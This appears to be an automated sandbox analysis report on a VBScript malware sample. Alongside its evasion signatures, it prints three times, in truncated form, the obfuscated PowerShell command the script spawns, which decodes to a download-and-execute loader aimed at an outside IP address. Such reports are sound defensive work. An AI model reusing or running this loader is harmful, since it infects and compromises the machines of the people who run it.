Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Prerem", "Unsupported parameter type 00000000")

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848DB7969 push ebx; retf	2_2_00007FF848DB796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848DB00BD pushad ; iretd	2_2_00007FF848DB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E879C9 push ebx; ret	2_2_00007FF848E879CA

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4682			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5219			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432

Thread sleep time: -5534023222112862s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000002.00000002.3350719704.000001BF33154000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_2448.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl 